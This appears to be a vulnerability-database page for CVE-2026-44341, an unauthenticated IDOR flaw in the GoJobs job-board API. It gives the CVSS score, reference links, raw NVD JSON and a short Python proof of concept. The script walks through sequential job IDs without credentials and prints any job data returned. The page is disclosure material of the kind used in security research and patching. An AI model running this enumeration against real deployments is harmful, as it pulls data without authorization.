CVE-2026-44341

Description

GoJobs is a REST API for a Job Board platform. The application exposes a job retrieval endpoint that allows unauthenticated users to access job details by directly manipulating object identifiers. The endpoint lacks proper authentication and authorization checks, resulting in unauthorized access to job data.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

GoJobs

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_idor(base_url, start_id=1, end_id=100):
    """
    PoC for CVE-2026-44341: IDOR in GoJobs API.
    Iterates through job IDs to check for unauthorized access.
    """
    print(f"[*] Scanning {base_url} for IDOR vulnerability...")
    
    for job_id in range(start_id, end_id + 1):
        target_url = f"{base_url.rstrip('/')}/{job_id}"
        try:
            # Send GET request without authentication headers
            response = requests.get(target_url, timeout=5)
            
            if response.status_code == 200:
                print(f"[+] Success! Job ID {job_id} leaked:")
                print(response.json())
            elif response.status_code == 401:
                print(f"[-] Job ID {job_id} is protected.")
            elif response.status_code == 404:
                pass # ID might not exist, skip verbose logging
            else:
                print(f"[!] Unexpected status code {response.status_code} for ID {job_id}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Connection error: {e}")

if __name__ == "__main__":
    # Replace with the actual vulnerable endpoint
    target_api = "http://localhost:8080/api/jobs"
    exploit_idor(target_api)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44341
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44341
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44341/
[4] VulDB https://vuldb.com/cve/CVE-2026-44341
[5] https://github.com/karnop/gojobs/security/advisories/GHSA-x2j8-h9xc-wpgf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44341", "sourceIdentifier": "[email protected]", "published": "2026-05-12T23:16:18.197", "lastModified": "2026-05-12T23:16:18.197", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "GoJobs is a REST API for a Job Board platform. The application exposes a job retrieval endpoint that allows unauthenticated users to access job details by directly manipulating object identifiers. The endpoint lacks proper authentication and authorization checks, resulting in unauthorized access to job data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/karnop/gojobs/security/advisories/GHSA-x2j8-h9xc-wpgf", "source": "[email protected]"}]}}